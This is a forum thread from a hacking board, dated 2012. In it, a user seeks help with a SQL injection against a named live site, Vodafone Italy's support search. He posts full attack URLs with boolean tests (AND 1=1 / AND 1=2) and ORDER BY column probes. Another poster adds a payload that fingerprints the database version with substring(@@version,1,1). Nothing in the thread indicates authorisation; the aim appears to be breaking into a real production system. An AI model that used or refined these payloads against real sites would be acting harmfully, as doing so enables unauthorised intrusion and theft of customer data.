Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Very Strange Result.
Posted by: Nerder
Date: May 01, 2012 12:26PM

i think that is vulnerable because when i try to put in the false codition such as AND 1=2 the page change

http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+and+1=1 [true]

http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+and+1=2 [false]

and when i try to inject a "ORDER BY" +query

http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+order+by+3-- [false]

http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+order+by+4-- [true]

the result change...
and if i try


http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61+order+by+2--

the result is differnt...
i'm going crazy for this injection!

I hope that anyone can help me!

BYE
Nerder!

Options: ReplyQuote
Re: Very Strange Result.
Posted by: annen
Date: May 02, 2012 06:01AM

http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61 and substring(@@version,1,1)=3

Options: ReplyQuote
Re: Very Strange Result.
Posted by: Nerder
Date: May 02, 2012 03:41PM

http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61%20and%20substring%28@@version,1,1%29=2 [true]

http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61%20and%20substring%28@@version,1,1%29=1 [true]

http://assistenza.vodafone.it/content/search?SearchText=ciao&SubTreeArray[]=61%20and%20substring%28@@version,1,1%29=0 [true]

How is it possible?

Options: ReplyQuote
Re: Very Strange Result.
Posted by: Nerder
Date: May 07, 2012 03:34PM

up please

Options: ReplyQuote
Re: Very Strange Result.
Posted by: Nerder
Date: May 15, 2012 05:49AM

nobody can solve?

Options: ReplyQuote


Sorry, only registered users may post in this forum.